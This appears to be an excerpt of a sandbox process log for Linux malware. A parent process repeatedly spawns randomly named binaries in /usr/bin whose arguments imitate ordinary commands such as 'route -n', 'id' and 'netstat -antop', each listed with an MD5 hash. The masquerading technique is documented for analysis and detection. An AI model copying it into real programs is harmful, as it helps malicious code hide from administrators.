dkuidbsedp New Fork (PID: 10418, Parent: 10417)

pnljtnsppb (PID: 10418, Parent: 10417, MD5: 40692a3a476d75da8623f32327526dd6) Arguments: /usr/bin/pnljtnsppb "netstat -antop" 9446

pnljtnsppb New Fork (PID: 10419, Parent: 10418)

dkuidbsedp New Fork (PID: 10428, Parent: 9446)

dkuidbsedp New Fork (PID: 10429, Parent: 10428)

lhyaaotaph (PID: 10429, Parent: 10428, MD5: 8b0c232594f545d682d180475cf5aa04) Arguments: /usr/bin/lhyaaotaph "route -n" 9446

lhyaaotaph New Fork (PID: 10430, Parent: 10429)

dkuidbsedp New Fork (PID: 10439, Parent: 9446)

dkuidbsedp New Fork (PID: 10440, Parent: 10439)

lhyaaotaph (PID: 10440, Parent: 10439, MD5: 8b0c232594f545d682d180475cf5aa04) Arguments: /usr/bin/lhyaaotaph id 9446

lhyaaotaph New Fork (PID: 10441, Parent: 10440)

dkuidbsedp New Fork (PID: 10450, Parent: 9446)

dkuidbsedp New Fork (PID: 10451, Parent: 10450)

lhyaaotaph (PID: 10451, Parent: 10450, MD5: 8b0c232594f545d682d180475cf5aa04) Arguments: /usr/bin/lhyaaotaph whoami 9446

lhyaaotaph New Fork (PID: 10452, Parent: 10451)

dkuidbsedp New Fork (PID: 10459, Parent: 9446)

dkuidbsedp New Fork (PID: 10461, Parent: 10459)

lhyaaotaph (PID: 10461, Parent: 3310, MD5: 8b0c232594f545d682d180475cf5aa04) Arguments: /usr/bin/lhyaaotaph ifconfig 9446

lhyaaotaph New Fork (PID: 10463, Parent: 10461)

dkuidbsedp New Fork (PID: 10462, Parent: 9446)

dkuidbsedp New Fork (PID: 10464, Parent: 10462)

lhyaaotaph (PID: 10464, Parent: 10462, MD5: 8b0c232594f545d682d180475cf5aa04) Arguments: /usr/bin/lhyaaotaph "grep \"A\"" 9446

lhyaaotaph New Fork (PID: 10466, Parent: 10464)

dkuidbsedp New Fork (PID: 10483, Parent: 9446)

dkuidbsedp New Fork (PID: 10484, Parent: 10483)

otigswehlv (PID: 10484, Parent: 3310, MD5: 2228daad34272962a9c0b67789ea5e77) Arguments: /usr/bin/otigswehlv "sleep 1" 9446

otigswehlv New Fork (PID: 10488, Parent: 10484)

dkuidbsedp New Fork (PID: 10485, Parent: 9446)

dkuidbsedp New Fork (PID: 10486, Parent: 10485)

otigswehlv (PID: 10486, Parent: 3310, MD5: 2228daad34272962a9c0b67789ea5e77) Arguments: /usr/bin/otigswehlv "route -n" 9446

otigswehlv New Fork (PID: 10500, Parent: 10486)

dkuidbsedp New Fork (PID: 10487, Parent: 9446)

dkuidbsedp New Fork (PID: 10489, Parent: 10487)

otigswehlv (PID: 10489, Parent: 3310, MD5: 2228daad34272962a9c0b67789ea5e77) Arguments: /usr/bin/otigswehlv sh 9446

otigswehlv New Fork (PID: 10502, Parent: 10489)

dkuidbsedp New Fork (PID: 10491, Parent: 9446)

dkuidbsedp New Fork (PID: 10493, Parent: 10491)

otigswehlv (PID: 10493, Parent: 3310, MD5: 2228daad34272962a9c0b67789ea5e77) Arguments: /usr/bin/otigswehlv "cat resolv.conf" 9446

otigswehlv New Fork (PID: 10498, Parent: 10493)

dkuidbsedp New Fork (PID: 10497, Parent: 9446)

dkuidbsedp New Fork (PID: 10499, Parent: 10497)

otigswehlv (PID: 10499, Parent: 10497, MD5: 2228daad34272962a9c0b67789ea5e77) Arguments: /usr/bin/otigswehlv "netstat -antop" 9446

otigswehlv New Fork (PID: 10503, Parent: 10499)

dkuidbsedp New Fork (PID: 10538, Parent: 9446)

dkuidbsedp New Fork (PID: 10539, Parent: 10538)

thzryslebl (PID: 10539, Parent: 3310, MD5: e3cb568f026ace3642e8e03b7d58acfa) Arguments: /usr/bin/thzryslebl gnome-terminal 9446

thzryslebl New Fork (PID: 10541, Parent: 10539)

dkuidbsedp New Fork (PID: 10540, Parent: 9446)

dkuidbsedp New Fork (PID: 10542, Parent: 10540)

thzryslebl (PID: 10542, Parent: 10540, MD5: e3cb568f026ace3642e8e03b7d58acfa) Arguments: /usr/bin/thzryslebl "cat resolv.conf" 9446

thzryslebl New Fork (PID: 10551, Parent: 10542)

dkuidbsedp New Fork (PID: 10544, Parent: 9446)

dkuidbsedp New Fork (PID: 10547, Parent: 10544)

thzryslebl (PID: 10547, Parent: 3310, MD5: e3cb568f026ace3642e8e03b7d58acfa) Arguments: /usr/bin/thzryslebl sh 9446

thzryslebl New Fork (PID: 10560, Parent: 10547)

dkuidbsedp New Fork (PID: 10549, Parent: 9446)

dkuidbsedp New Fork (PID: 10553, Parent: 10549)

thzryslebl (PID: 10553, Parent: 3310, MD5: e3cb568f026ace3642e8e03b7d58acfa) Arguments: /usr/bin/thzryslebl id 9446

thzryslebl New Fork (PID: 10569, Parent: 10553)

dkuidbsedp New Fork (PID: 10556, Parent: 9446)

dkuidbsedp New Fork (PID: 10561, Parent: 10556)

thzryslebl (PID: 10561, Parent: 10556, MD5: e3cb568f026ace3642e8e03b7d58acfa) Arguments: /usr/bin/thzryslebl "echo \"find\"" 9446

thzryslebl New Fork (PID: 10574, Parent: 10561)

dkuidbsedp New Fork (PID: 10595, Parent: 9446)

dkuidbsedp New Fork (PID: 10596, Parent: 10595)

sunvkgnszw (PID: 10596, Parent: 3310, MD5: 3c729bbc723a5ec2053509a8a7b8f520) Arguments: /usr/bin/sunvkgnszw "ifconfig eth0" 9446

sunvkgnszw New Fork (PID: 10603, Parent: 10596)

dkuidbsedp New Fork (PID: 10597, Parent: 9446)

dkuidbsedp New Fork (PID: 10599, Parent: 10597)

sunvkgnszw (PID: 10599, Parent: 3310, MD5: 3c729bbc723a5ec2053509a8a7b8f520) Arguments: /usr/bin/sunvkgnszw "cd /etc" 9446

sunvkgnszw New Fork (PID: 10609, Parent: 10599)

dkuidbsedp New Fork (PID: 10600, Parent: 9446)

dkuidbsedp New Fork (PID: 10604, Parent: 10600)

sunvkgnszw (PID: 10604, Parent: 3310, MD5: 3c729bbc723a5ec2053509a8a7b8f520) Arguments: /usr/bin/sunvkgnszw uptime 9446

sunvkgnszw New Fork (PID: 10617, Parent: 10604)

dkuidbsedp New Fork (PID: 10606, Parent: 9446)

dkuidbsedp New Fork (PID: 10608, Parent: 10606)

sunvkgnszw (PID: 10608, Parent: 3310, MD5: 3c729bbc723a5ec2053509a8a7b8f520) Arguments: /usr/bin/sunvkgnszw "ls -la" 9446

sunvkgnszw New Fork (PID: 10615, Parent: 10608)

dkuidbsedp New Fork (PID: 10611, Parent: 9446)

dkuidbsedp New Fork (PID: 10614, Parent: 10611)

sunvkgnszw (PID: 10614, Parent: 3310, MD5: 3c729bbc723a5ec2053509a8a7b8f520) Arguments: /usr/bin/sunvkgnszw id 9446

sunvkgnszw New Fork (PID: 10620, Parent: 10614)

dkuidbsedp New Fork (PID: 10650, Parent: 9446)

dkuidbsedp New Fork (PID: 10651, Parent: 10650)

yclsxhkbli (PID: 10651, Parent: 3310, MD5: 595277e5113341b08e8774d7eff08b83) Arguments: /usr/bin/yclsxhkbli pwd 9446

yclsxhkbli New Fork (PID: 10656, Parent: 10651)

dkuidbsedp New Fork (PID: 10652, Parent: 9446)

dkuidbsedp New Fork (PID: 10654, Parent: 10652)

yclsxhkbli (PID: 10654, Parent: 3310, MD5: 595277e5113341b08e8774d7eff08b83) Arguments: /usr/bin/yclsxhkbli "route -n" 9446

yclsxhkbli New Fork (PID: 10663, Parent: 10654)

dkuidbsedp New Fork (PID: 10655, Parent: 9446)

dkuidbsedp New Fork (PID: 10659, Parent: 10655)

yclsxhkbli (PID: 10659, Parent: 3310, MD5: 595277e5113341b08e8774d7eff08b83) Arguments: /usr/bin/yclsxhkbli "route -n" 9446

yclsxhkbli New Fork (PID: 10670, Parent: 10659)

dkuidbsedp New Fork (PID: 10661, Parent: 9446)

dkuidbsedp New Fork (PID: 10665, Parent: 10661)

yclsxhkbli (PID: 10665, Parent: 3310, MD5: 595277e5113341b08e8774d7eff08b83) Arguments: /usr/bin/yclsxhkbli uptime 9446

yclsxhkbli New Fork (PID: 10677, Parent: 10665)

dkuidbsedp New Fork (PID: 10668, Parent: 9446)

dkuidbsedp New Fork (PID: 10672, Parent: 10668)

yclsxhkbli (PID: 10672, Parent: 3310, MD5: 595277e5113341b08e8774d7eff08b83) Arguments: /usr/bin/yclsxhkbli "cat resolv.conf" 9446

yclsxhkbli New Fork (PID: 10675, Parent: 10672)

dkuidbsedp New Fork (PID: 10705, Parent: 9446)

dkuidbsedp New Fork (PID: 10706, Parent: 10705)

nvlkgshfzs (PID: 10706, Parent: 3310, MD5: 5a99f637c7edead59c4587f692d6b428) Arguments: /usr/bin/nvlkgshfzs uptime 9446

nvlkgshfzs New Fork (PID: 10710, Parent: 10706)

dkuidbsedp New Fork (PID: 10707, Parent: 9446)

dkuidbsedp New Fork (PID: 10708, Parent: 10707)

nvlkgshfzs (PID: 10708, Parent: 3310, MD5: 5a99f637c7edead59c4587f692d6b428) Arguments: /usr/bin/nvlkgshfzs su 9446

nvlkgshfzs New Fork (PID: 10716, Parent: 10708)

dkuidbsedp New Fork (PID: 10709, Parent: 9446)

dkuidbsedp New Fork (PID: 10711, Parent: 10709)

nvlkgshfzs (PID: 10711, Parent: 3310, MD5: 5a99f637c7edead59c4587f692d6b428) Arguments: /usr/bin/nvlkgshfzs "netstat -an" 9446

nvlkgshfzs New Fork (PID: 10722, Parent: 10711)

dkuidbsedp New Fork (PID: 10712, Parent: 9446)

dkuidbsedp New Fork (PID: 10714, Parent: 10712)

nvlkgshfzs (PID: 10714, Parent: 3310, MD5: 5a99f637c7edead59c4587f692d6b428) Arguments: /usr/bin/nvlkgshfzs "echo \"find\"" 9446

nvlkgshfzs New Fork (PID: 10720, Parent: 10714)

dkuidbsedp New Fork (PID: 10715, Parent: 9446)

dkuidbsedp New Fork (PID: 10718, Parent: 10715)

nvlkgshfzs (PID: 10718, Parent: 3310, MD5: 5a99f637c7edead59c4587f692d6b428) Arguments: /usr/bin/nvlkgshfzs "ifconfig eth0" 9446

nvlkgshfzs New Fork (PID: 10728, Parent: 10718)

dkuidbsedp New Fork (PID: 10760, Parent: 9446)

dkuidbsedp New Fork (PID: 10761, Parent: 10760)

wgerzwaeqg (PID: 10761, Parent: 3310, MD5: 26f4791e4abad1456b3c4b154d2d2918) Arguments: /usr/bin/wgerzwaeqg whoami 9446

wgerzwaeqg New Fork (PID: 10763, Parent: 10761)

dkuidbsedp New Fork (PID: 10762, Parent: 9446)

dkuidbsedp New Fork (PID: 10764, Parent: 10762)

wgerzwaeqg (PID: 10764, Parent: 10762, MD5: 26f4791e4abad1456b3c4b154d2d2918) Arguments: /usr/bin/wgerzwaeqg "route -n" 9446

wgerzwaeqg New Fork (PID: 10765, Parent: 10764)

dkuidbsedp New Fork (PID: 10766, Parent: 9446)

dkuidbsedp New Fork (PID: 10767, Parent: 10766)

wgerzwaeqg (PID: 10767, Parent: 3310, MD5: 26f4791e4abad1456b3c4b154d2d2918) Arguments: /usr/bin/wgerzwaeqg ls 9446

wgerzwaeqg New Fork (PID: 10770, Parent: 10767)

dkuidbsedp New Fork (PID: 10769, Parent: 9446)

dkuidbsedp New Fork (PID: 10772, Parent: 10769)

wgerzwaeqg (PID: 10772, Parent: 3310, MD5: 26f4791e4abad1456b3c4b154d2d2918) Arguments: /usr/bin/wgerzwaeqg uptime 9446

wgerzwaeqg New Fork (PID: 10779, Parent: 10772)

dkuidbsedp New Fork (PID: 10775, Parent: 9446)

dkuidbsedp New Fork (PID: 10777, Parent: 10775)

wgerzwaeqg (PID: 10777, Parent: 10775, MD5: 26f4791e4abad1456b3c4b154d2d2918) Arguments: /usr/bin/wgerzwaeqg "sleep 1" 9446

wgerzwaeqg New Fork (PID: 10785, Parent: 10777)

dkuidbsedp New Fork (PID: 10815, Parent: 9446)

dkuidbsedp New Fork (PID: 10816, Parent: 10815)

chvtxqzhiw (PID: 10816, Parent: 3310, MD5: 95a3baa8a504f487595262f5f028bf8e) Arguments: /usr/bin/chvtxqzhiw "cat resolv.conf" 9446

chvtxqzhiw New Fork (PID: 10818, Parent: 10816)

dkuidbsedp New Fork (PID: 10817, Parent: 9446)

dkuidbsedp New Fork (PID: 10819, Parent: 10817)

chvtxqzhiw (PID: 10819, Parent: 10817, MD5: 95a3baa8a504f487595262f5f028bf8e) Arguments: /usr/bin/chvtxqzhiw gnome-terminal 9446

chvtxqzhiw New Fork (PID: 10820, Parent: 10819)

dkuidbsedp New Fork (PID: 10821, Parent: 9446)

dkuidbsedp New Fork (PID: 10824, Parent: 10821)

chvtxqzhiw (PID: 10824, Parent: 3310, MD5: 95a3baa8a504f487595262f5f028bf8e) Arguments: /usr/bin/chvtxqzhiw ifconfig 9446

chvtxqzhiw New Fork (PID: 10832, Parent: 10824)

dkuidbsedp New Fork (PID: 10826, Parent: 9446)

dkuidbsedp New Fork (PID: 10829, Parent: 10826)

chvtxqzhiw (PID: 10829, Parent: 3310, MD5: 95a3baa8a504f487595262f5f028bf8e) Arguments: /usr/bin/chvtxqzhiw bash 9446

chvtxqzhiw New Fork (PID: 10841, Parent: 10829)

dkuidbsedp New Fork (PID: 10831, Parent: 9446)

dkuidbsedp New Fork (PID: 10834, Parent: 10831)

chvtxqzhiw (PID: 10834, Parent: 3310, MD5: 95a3baa8a504f487595262f5f028bf8e) Arguments: /usr/bin/chvtxqzhiw top 9446

chvtxqzhiw New Fork (PID: 10838, Parent: 10834)

dkuidbsedp New Fork (PID: 10870, Parent: 9446)

dkuidbsedp New Fork (PID: 10871, Parent: 10870)

qwevskbjgs (PID: 10871, Parent: 3310, MD5: c3ba5c7cde48244ebce7e6220e2b27fd) Arguments: /usr/bin/qwevskbjgs su 9446

qwevskbjgs New Fork (PID: 10873, Parent: 10871)

dkuidbsedp New Fork (PID: 10872, Parent: 9446)

dkuidbsedp New Fork (PID: 10874, Parent: 10872)

qwevskbjgs (PID: 10874, Parent: 3310, MD5: c3ba5c7cde48244ebce7e6220e2b27fd) Arguments: /usr/bin/qwevskbjgs "route -n" 9446

qwevskbjgs New Fork (PID: 10876, Parent: 10874)

dkuidbsedp New Fork (PID: 10875, Parent: 9446)

dkuidbsedp New Fork (PID: 10877, Parent: 10875)

qwevskbjgs (PID: 10877, Parent: 3310, MD5: c3ba5c7cde48244ebce7e6220e2b27fd) Arguments: /usr/bin/qwevskbjgs pwd 9446

qwevskbjgs New Fork (PID: 10880, Parent: 10877)

dkuidbsedp New Fork (PID: 10879, Parent: 9446)

dkuidbsedp New Fork (PID: 10882, Parent: 10879)

qwevskbjgs (PID: 10882, Parent: 10879, MD5: c3ba5c7cde48244ebce7e6220e2b27fd) Arguments: /usr/bin/qwevskbjgs uptime 9446

qwevskbjgs New Fork (PID: 10884, Parent: 10882)

dkuidbsedp New Fork (PID: 10886, Parent: 9446)

dkuidbsedp New Fork (PID: 10889, Parent: 10886)

qwevskbjgs (PID: 10889, Parent: 3310, MD5: c3ba5c7cde48244ebce7e6220e2b27fd) Arguments: /usr/bin/qwevskbjgs "sleep 1" 9446

qwevskbjgs New Fork (PID: 10891, Parent: 10889)

dkuidbsedp New Fork (PID: 10925, Parent: 9446)

dkuidbsedp New Fork (PID: 10926, Parent: 10925)

kztofeuxtk (PID: 10926, Parent: 3310, MD5: 62ca1425a6696323f767d20d3413c202) Arguments: /usr/bin/kztofeuxtk su 9446

kztofeuxtk New Fork (PID: 10929, Parent: 10926)

dkuidbsedp New Fork (PID: 10927, Parent: 9446)

dkuidbsedp New Fork (PID: 10928, Parent: 10927)

kztofeuxtk (PID: 10928, Parent: 3310, MD5: 62ca1425a6696323f767d20d3413c202) Arguments: /usr/bin/kztofeuxtk "netstat -an" 9446

kztofeuxtk New Fork (PID: 10936, Parent: 10928)

dkuidbsedp New Fork (PID: 10930, Parent: 9446)

dkuidbsedp New Fork (PID: 10931, Parent: 10930)

kztofeuxtk (PID: 10931, Parent: 3310, MD5: 62ca1425a6696323f767d20d3413c202) Arguments: /usr/bin/kztofeuxtk who 9446

kztofeuxtk New Fork (PID: 10939, Parent: 10931)

dkuidbsedp New Fork (PID: 10932, Parent: 9446)

dkuidbsedp New Fork (PID: 10933, Parent: 10932)

kztofeuxtk (PID: 10933, Parent: 3310, MD5: 62ca1425a6696323f767d20d3413c202) Arguments: /usr/bin/kztofeuxtk "netstat -an" 9446

kztofeuxtk New Fork (PID: 10935, Parent: 10933)

dkuidbsedp New Fork (PID: 10934, Parent: 9446)

dkuidbsedp New Fork (PID: 10938, Parent: 10934)

kztofeuxtk (PID: 10938, Parent: 10934, MD5: 62ca1425a6696323f767d20d3413c202) Arguments: /usr/bin/kztofeuxtk uptime 9446

kztofeuxtk New Fork (PID: 10941, Parent: 10938)

dkuidbsedp New Fork (PID: 10980, Parent: 9446)

dkuidbsedp New Fork (PID: 10981, Parent: 10980)

tihvbqlbyh (PID: 10981, Parent: 3310, MD5: 5a151b9cf6355b8e27d8585ffa77f259) Arguments: /usr/bin/tihvbqlbyh ifconfig 9446

tihvbqlbyh New Fork (PID: 10983, Parent: 10981)

dkuidbsedp New Fork (PID: 10982, Parent: 9446)

dkuidbsedp New Fork (PID: 10984, Parent: 10982)

tihvbqlbyh (PID: 10984, Parent: 3310, MD5: 5a151b9cf6355b8e27d8585ffa77f259) Arguments: /usr/bin/tihvbqlbyh sh 9446

tihvbqlbyh New Fork (PID: 10987, Parent: 10984)

dkuidbsedp New Fork (PID: 10985, Parent: 9446)

dkuidbsedp New Fork (PID: 10988, Parent: 10985)

tihvbqlbyh (PID: 10988, Parent: 10985, MD5: 5a151b9cf6355b8e27d8585ffa77f259) Arguments: /usr/bin/tihvbqlbyh su 9446

tihvbqlbyh New Fork (PID: 10990, Parent: 10988)

dkuidbsedp New Fork (PID: 10991, Parent: 9446)

dkuidbsedp New Fork (PID: 10995, Parent: 10991)

tihvbqlbyh (PID: 10995, Parent: 3310, MD5: 5a151b9cf6355b8e27d8585ffa77f259) Arguments: /usr/bin/tihvbqlbyh "cd /etc" 9446

tihvbqlbyh New Fork (PID: 11002, Parent: 10995)

dkuidbsedp New Fork (PID: 11000, Parent: 9446)

dkuidbsedp New Fork (PID: 11004, Parent: 11000)

tihvbqlbyh (PID: 11004, Parent: 11000, MD5: 5a151b9cf6355b8e27d8585ffa77f259) Arguments: /usr/bin/tihvbqlbyh "echo \"find\"" 9446

tihvbqlbyh New Fork (PID: 11006, Parent: 11004)

dkuidbsedp New Fork (PID: 11035, Parent: 9446)

dkuidbsedp New Fork (PID: 11036, Parent: 11035)

evsgasjgju (PID: 11036, Parent: 3310, MD5: a99a5cd9581ce3735104776f185cd259) Arguments: /usr/bin/evsgasjgju "ps -ef" 9446

evsgasjgju New Fork (PID: 11038, Parent: 11036)

dkuidbsedp New Fork (PID: 11037, Parent: 9446)

dkuidbsedp New Fork (PID: 11039, Parent: 11037)

evsgasjgju (PID: 11039, Parent: 3310, MD5: a99a5cd9581ce3735104776f185cd259) Arguments: /usr/bin/evsgasjgju id 9446

evsgasjgju New Fork (PID: 11046, Parent: 11039)

dkuidbsedp New Fork (PID: 11041, Parent: 9446)

dkuidbsedp New Fork (PID: 11043, Parent: 11041)

evsgasjgju (PID: 11043, Parent: 3310, MD5: a99a5cd9581ce3735104776f185cd259) Arguments: /usr/bin/evsgasjgju who 9446

evsgasjgju New Fork (PID: 11059, Parent: 11043)

dkuidbsedp New Fork (PID: 11045, Parent: 9446)

dkuidbsedp New Fork (PID: 11050, Parent: 11045)

evsgasjgju (PID: 11050, Parent: 3310, MD5: a99a5cd9581ce3735104776f185cd259) Arguments: /usr/bin/evsgasjgju "route -n" 9446

evsgasjgju New Fork (PID: 11054, Parent: 11050)

dkuidbsedp New Fork (PID: 11051, Parent: 9446)

dkuidbsedp New Fork (PID: 11055, Parent: 11051)

evsgasjgju (PID: 11055, Parent: 11051, MD5: a99a5cd9581ce3735104776f185cd259) Arguments: /usr/bin/evsgasjgju whoami 9446

evsgasjgju New Fork (PID: 11060, Parent: 11055)

dkuidbsedp New Fork (PID: 11100, Parent: 9446)

dkuidbsedp New Fork (PID: 11101, Parent: 11100)

jyfcwmvcim (PID: 11101, Parent: 3310, MD5: 8afc239e681af15bdc90d121acc9ded4) Arguments: /usr/bin/jyfcwmvcim pwd 9446

jyfcwmvcim New Fork (PID: 11107, Parent: 11101)

dkuidbsedp New Fork (PID: 11102, Parent: 9446)

dkuidbsedp New Fork (PID: 11103, Parent: 11102)

jyfcwmvcim (PID: 11103, Parent: 3310, MD5: 8afc239e681af15bdc90d121acc9ded4) Arguments: /usr/bin/jyfcwmvcim whoami 9446

jyfcwmvcim New Fork (PID: 11123, Parent: 11103)

dkuidbsedp New Fork (PID: 11104, Parent: 9446)

dkuidbsedp New Fork (PID: 11105, Parent: 11104)

jyfcwmvcim (PID: 11105, Parent: 3310, MD5: 8afc239e681af15bdc90d121acc9ded4) Arguments: /usr/bin/jyfcwmvcim "cat resolv.conf" 9446

jyfcwmvcim New Fork (PID: 11111, Parent: 11105)

dkuidbsedp New Fork (PID: 11106, Parent: 9446)

dkuidbsedp New Fork (PID: 11109, Parent: 11106)

jyfcwmvcim (PID: 11109, Parent: 3310, MD5: 8afc239e681af15bdc90d121acc9ded4) Arguments: /usr/bin/jyfcwmvcim id 9446

jyfcwmvcim New Fork (PID: 11115, Parent: 11109)

dkuidbsedp New Fork (PID: 11110, Parent: 9446)

dkuidbsedp New Fork (PID: 11114, Parent: 11110)

jyfcwmvcim (PID: 11114, Parent: 3310, MD5: 8afc239e681af15bdc90d121acc9ded4) Arguments: /usr/bin/jyfcwmvcim ifconfig 9446

jyfcwmvcim New Fork (PID: 11118, Parent: 11114)

dkuidbsedp New Fork (PID: 11155, Parent: 9446)

dkuidbsedp New Fork (PID: 11156, Parent: 11155)

nwaorjvecz (PID: 11156, Parent: 3310, MD5: 6e2bcd4f3e4b8df9abbda28156055f4b) Arguments: /usr/bin/nwaorjvecz "ifconfig eth0" 9446

nwaorjvecz New Fork (PID: 11173, Parent: 11156)

dkuidbsedp New Fork (PID: 11157, Parent: 9446)

dkuidbsedp New Fork (PID: 11158, Parent: 11157)

nwaorjvecz (PID: 11158, Parent: 3310, MD5: 6e2bcd4f3e4b8df9abbda28156055f4b) Arguments: /usr/bin/nwaorjvecz "netstat -an" 9446

nwaorjvecz New Fork (PID: 11174, Parent: 11158)

dkuidbsedp New Fork (PID: 11159, Parent: 9446)

dkuidbsedp New Fork (PID: 11160, Parent: 11159)

nwaorjvecz (PID: 11160, Parent: 3310, MD5: 6e2bcd4f3e4b8df9abbda28156055f4b) Arguments: /usr/bin/nwaorjvecz "cd /etc" 9446

nwaorjvecz New Fork (PID: 11182, Parent: 11160)

dkuidbsedp New Fork (PID: 11161, Parent: 9446)

dkuidbsedp New Fork (PID: 11163, Parent: 11161)

nwaorjvecz (PID: 11163, Parent: 3310, MD5: 6e2bcd4f3e4b8df9abbda28156055f4b) Arguments: /usr/bin/nwaorjvecz "echo \"find\"" 9446

nwaorjvecz New Fork (PID: 11168, Parent: 11163)

dkuidbsedp New Fork (PID: 11164, Parent: 9446)

dkuidbsedp New Fork (PID: 11167, Parent: 11164)

nwaorjvecz (PID: 11167, Parent: 3310, MD5: 6e2bcd4f3e4b8df9abbda28156055f4b) Arguments: /usr/bin/nwaorjvecz uptime 9446

nwaorjvecz New Fork (PID: 11169, Parent: 11167)

dkuidbsedp New Fork (PID: 11210, Parent: 9446)

dkuidbsedp New Fork (PID: 11211, Parent: 11210)

cqsoclzfrt (PID: 11211, Parent: 3310, MD5: f7d314a270bd8415612f3c3e62c2e481) Arguments: /usr/bin/cqsoclzfrt whoami 9446

cqsoclzfrt New Fork (PID: 11217, Parent: 11211)

dkuidbsedp New Fork (PID: 11212, Parent: 9446)

dkuidbsedp New Fork (PID: 11213, Parent: 11212)

cqsoclzfrt (PID: 11213, Parent: 3310, MD5: f7d314a270bd8415612f3c3e62c2e481) Arguments: /usr/bin/cqsoclzfrt "cd /etc" 9446

cqsoclzfrt New Fork (PID: 11226, Parent: 11213)

dkuidbsedp New Fork (PID: 11214, Parent: 9446)

dkuidbsedp New Fork (PID: 11215, Parent: 11214)

cqsoclzfrt (PID: 11215, Parent: 3310, MD5: f7d314a270bd8415612f3c3e62c2e481) Arguments: /usr/bin/cqsoclzfrt pwd 9446

cqsoclzfrt New Fork (PID: 11221, Parent: 11215)

dkuidbsedp New Fork (PID: 11216, Parent: 9446)

dkuidbsedp New Fork (PID: 11218, Parent: 11216)

cqsoclzfrt (PID: 11218, Parent: 3310, MD5: f7d314a270bd8415612f3c3e62c2e481) Arguments: /usr/bin/cqsoclzfrt who 9446

cqsoclzfrt New Fork (PID: 11225, Parent: 11218)

dkuidbsedp New Fork (PID: 11219, Parent: 9446)

dkuidbsedp New Fork (PID: 11222, Parent: 11219)

cqsoclzfrt (PID: 11222, Parent: 3310, MD5: f7d314a270bd8415612f3c3e62c2e481) Arguments: /usr/bin/cqsoclzfrt su 9446

cqsoclzfrt New Fork (PID: 11233, Parent: 11222)

dkuidbsedp New Fork (PID: 11267, Parent: 9446)

dkuidbsedp New Fork (PID: 11268, Parent: 11267)

udrzmjfbgf (PID: 11268, Parent: 3310, MD5: 6ae6aafbe50076dc10606f80cdc189e9) Arguments: /usr/bin/udrzmjfbgf pwd 9446

udrzmjfbgf New Fork (PID: 11277, Parent: 11268)

dkuidbsedp New Fork (PID: 11269, Parent: 9446)

dkuidbsedp New Fork (PID: 11270, Parent: 11269)

udrzmjfbgf (PID: 11270, Parent: 3310, MD5: 6ae6aafbe50076dc10606f80cdc189e9) Arguments: /usr/bin/udrzmjfbgf top 9446

udrzmjfbgf New Fork (PID: 11282, Parent: 11270)

dkuidbsedp New Fork (PID: 11271, Parent: 9446)

dkuidbsedp New Fork (PID: 11272, Parent: 11271)

udrzmjfbgf (PID: 11272, Parent: 3310, MD5: 6ae6aafbe50076dc10606f80cdc189e9) Arguments: /usr/bin/udrzmjfbgf top 9446

udrzmjfbgf New Fork (PID: 11281, Parent: 11272)

dkuidbsedp New Fork (PID: 11273, Parent: 9446)

dkuidbsedp New Fork (PID: 11274, Parent: 11273)

udrzmjfbgf (PID: 11274, Parent: 3310, MD5: 6ae6aafbe50076dc10606f80cdc189e9) Arguments: /usr/bin/udrzmjfbgf su 9446

udrzmjfbgf New Fork (PID: 11286, Parent: 11274)

dkuidbsedp New Fork (PID: 11275, Parent: 9446)

dkuidbsedp New Fork (PID: 11278, Parent: 11275)

udrzmjfbgf (PID: 11278, Parent: 3310, MD5: 6ae6aafbe50076dc10606f80cdc189e9) Arguments: /usr/bin/udrzmjfbgf "cd /etc" 9446

udrzmjfbgf New Fork (PID: 11291, Parent: 11278)

dkuidbsedp New Fork (PID: 11322, Parent: 9446)

dkuidbsedp New Fork (PID: 11323, Parent: 11322)

qwgryggbpq (PID: 11323, Parent: 3310, MD5: 7c4643504cfef169ef231669a383f647) Arguments: /usr/bin/qwgryggbpq whoami 9446

qwgryggbpq New Fork (PID: 11333, Parent: 11323)

dkuidbsedp New Fork (PID: 11324, Parent: 9446)

dkuidbsedp New Fork (PID: 11325, Parent: 11324)

qwgryggbpq (PID: 11325, Parent: 3310, MD5: 7c4643504cfef169ef231669a383f647) Arguments: /usr/bin/qwgryggbpq whoami 9446

qwgryggbpq New Fork (PID: 11334, Parent: 11325)

dkuidbsedp New Fork (PID: 11326, Parent: 9446)

dkuidbsedp New Fork (PID: 11327, Parent: 11326)

qwgryggbpq (PID: 11327, Parent: 3310, MD5: 7c4643504cfef169ef231669a383f647) Arguments: /usr/bin/qwgryggbpq uptime 9446

qwgryggbpq New Fork (PID: 11335, Parent: 11327)

dkuidbsedp New Fork (PID: 11328, Parent: 9446)

dkuidbsedp New Fork (PID: 11329, Parent: 11328)

qwgryggbpq (PID: 11329, Parent: 3310, MD5: 7c4643504cfef169ef231669a383f647) Arguments: /usr/bin/qwgryggbpq "cat resolv.conf" 9446

qwgryggbpq New Fork (PID: 11332, Parent: 11329)

dkuidbsedp New Fork (PID: 11330, Parent: 9446)

dkuidbsedp New Fork (PID: 11331, Parent: 11330)

qwgryggbpq (PID: 11331, Parent: 3310, MD5: 7c4643504cfef169ef231669a383f647) Arguments: /usr/bin/qwgryggbpq "ls -la" 9446

qwgryggbpq New Fork (PID: 11336, Parent: 11331)

dkuidbsedp New Fork (PID: 11377, Parent: 9446)

dkuidbsedp New Fork (PID: 11378, Parent: 11377)

thqvayvyih (PID: 11378, Parent: 3310, MD5: 8a8795dac29dbd91def3756d2c65bc8d) Arguments: /usr/bin/thqvayvyih whoami 9446

thqvayvyih New Fork (PID: 11387, Parent: 11378)

dkuidbsedp New Fork (PID: 11379, Parent: 9446)

dkuidbsedp New Fork (PID: 11380, Parent: 11379)

thqvayvyih (PID: 11380, Parent: 3310, MD5: 8a8795dac29dbd91def3756d2c65bc8d) Arguments: /usr/bin/thqvayvyih uptime 9446

thqvayvyih New Fork (PID: 11389, Parent: 11380)

dkuidbsedp New Fork (PID: 11381, Parent: 9446)

dkuidbsedp New Fork (PID: 11382, Parent: 11381)

thqvayvyih (PID: 11382, Parent: 3310, MD5: 8a8795dac29dbd91def3756d2c65bc8d) Arguments: /usr/bin/thqvayvyih "netstat -antop" 9446

thqvayvyih New Fork (PID: 11392, Parent: 11382)

dkuidbsedp New Fork (PID: 11383, Parent: 9446)

dkuidbsedp New Fork (PID: 11384, Parent: 11383)

thqvayvyih (PID: 11384, Parent: 3310, MD5: 8a8795dac29dbd91def3756d2c65bc8d) Arguments: /usr/bin/thqvayvyih "route -n" 9446

thqvayvyih New Fork (PID: 11390, Parent: 11384)

dkuidbsedp New Fork (PID: 11385, Parent: 9446)

dkuidbsedp New Fork (PID: 11386, Parent: 11385)

